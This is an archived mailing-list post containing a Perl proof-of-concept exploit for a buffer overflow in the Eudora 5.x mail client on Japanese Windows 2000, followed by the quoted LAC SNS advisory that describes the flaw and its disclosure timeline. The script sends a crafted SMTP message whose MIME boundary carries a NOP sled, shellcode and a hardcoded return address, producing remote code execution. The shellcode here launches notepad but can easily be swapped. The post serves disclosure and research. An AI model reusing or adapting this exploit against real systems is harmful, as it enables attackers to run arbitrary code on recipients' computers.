This is a proof of concept exploit for Eudora 5.x buffer overflow. Tested on: Japanese Windows 2000 Professional SP2 Eudora Version 5.0.2-Jr2 #!/usr/local/bin/perl #--------------------------------------------------------------------- # Eudora Version 5.0.2-Jr2 exploit for Japanese Windows 2000 Pro (SP2) # written by Kanatoko <anvil@jumperz.net> # http://www.jumperz.net/ #--------------------------------------------------------------------- use Socket; $connect_host = 'mail.jumperz.net'; $port = 25; $env_from = 'anvil@jumperz.net'; $env_to = 'target@jumperz.net'; $from = 'anvil@jumperz.net'; $to = 'target@jumperz.net'; $iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n"; $sock_addr = pack_sockaddr_in($port,$iaddr); socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n"; connect(SOCKET,$sock_addr) || die "Connect Error\n"; select(SOCKET); $|=1; select(STDOUT); #egg written by UNYUN (http://www.shadowpenguin.org/) #57bytes $egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2"; $egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7"; $egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C"; $egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB"; $egg .= "\xFD\xE8\xD4\xFF\xFF\xFF"; $egg .= "notepad.exe"; $buf = "\x90" x 121; $buf .= $egg; $buf .= "\xEB\xA0"; #JMP -0x60 $buf .= "A" x 2; $buf .= "\x97\xAC\xE3\x77"; #0x77e3ac97 JMP EBX in user32.dll $hoge = <SOCKET>; print SOCKET "HELO hoge\x0D\x0A"; $hoge = <SOCKET>; print SOCKET "MAIL FROM:<$env_from>\x0D\x0A"; $hoge = <SOCKET>; print SOCKET "RCPT TO:<$env_to>\x0D\x0A"; $hoge = <SOCKET>; print SOCKET "DATA\x0D\x0A"; $hoge = <SOCKET>; print SOCKET << "_EOD_"; MIME-Version: 1.0\x0D >From: $from\x0D To: $to\x0D Content-Type: multipart/mixed; boundary="$buf"\x0D \x0D .\x0D _EOD_ $hoge = <SOCKET>; print SOCKET "QUIT\x0D\x0A"; $hoge = <SOCKET>; -- Kanatoko <anvil@jumperz.net> JUMPER : http://www.jumperz.net/(Japanese) On Mon, 05 Aug 2002 15:24:25 +0900 snsadv@lac.co.jp wrote: > ---------------------------------------------------------------------- > SNS Advisory No.55 > Eudora 5.x for Windows Buffer Overflow Vulnerability > > Problem first discovered: 6 Jun 2002 > Published: 5 Aug 2002 > ---------------------------------------------------------------------- > > Overview: > --------- > Eudora 5.x for Windows contains a buffer overflow vulnerability, > which could allow a remote attacker to execute arbitrary code. > > Problem Description: > -------------------- > Eudora developed and distributed by QUALCOMM Inc. > (http://www.qualcomm.com/), is a Mail User Agent running on Windows > 95/98/2000/ME/NT 4.0 and MacOS 8.1 or later. > > The buffer overflow occurs when Eudora receives a message using a long > string as a boundary, which is used to divide a multi-part message into > separate parts. In our verification environment, we have found that > this could allow arbitrary commands to be executed. > > Tested Version: > --------------- > Eudora 5.0-J for Windows (Ver.5.0.2-Jr2 trial) [Japanese] > Eudora 5.1.1 for Windows (Sponsored Mode) [English] > > Tested OS: > ---------- > Microsoft Windows 2000 Professional SP2 [Japanese] > Microsoft Windows 98 SE [Japanese] > > Solution: > --------- > The problem will be fixed in the next release of Eudora. > The vendor has not reported when the next release will be available. > > Communication background: > ------------------------- > 6 Jun 2002 : We discovered the vulnerability. > 6 Jun 2002 : We reported the findings to Livin' on the EDGE Co., Ltd. > (user support of Japanese version) . > 14 Jun 2002 : the findings were reported again to Livin' on the EDGE Co., > Ltd. . > 17 Jun 2002 : We contacted QUALCOMM Inc. . > 18 Jun 2002 : QUALCOMM Inc. sent a reply stating that they had started an > investigation of the problem. > 3 Jul 2002 : We asked QUALCOMM Inc. about the progress of the > investigation > 19 Jul 2002 : We asked QUALCOMM Inc. again about the progress of the > investigation > 24 Jul 2002 : We informed QUALCOMM Inc. about the announcement schedule > of this advisory > 25 Jul 2002 : QUALCOMM Inc. reported that this problem will be fixed in > the next release > 5 Aug 2002 : We decided to disclose this vulnerability due to concern > over the potential consequences this issue may cause. > Livin' on the EDGE Co., Ltd. has not provided any comments > on this issue as of August 5, 2002. > > Discovered by: > -------------- > Nobuo Miwa (LAC / n-miwa@lac.co.jp) > > Disclaimer: > ----------- > All information in these advisories are subject to change without any > advanced notices neither mutual consensus, and each of them is released > as it is. LAC Co.,Ltd. is not responsible for any risks of occurrences > caused by applying those information. > > ------------------------------------------------------------------ > SecureNet Service(SNS) Security Advisory <snsadv@lac.co.jp> > Computer Security Laboratory, LAC http://www.lac.co.jp/security/ > >
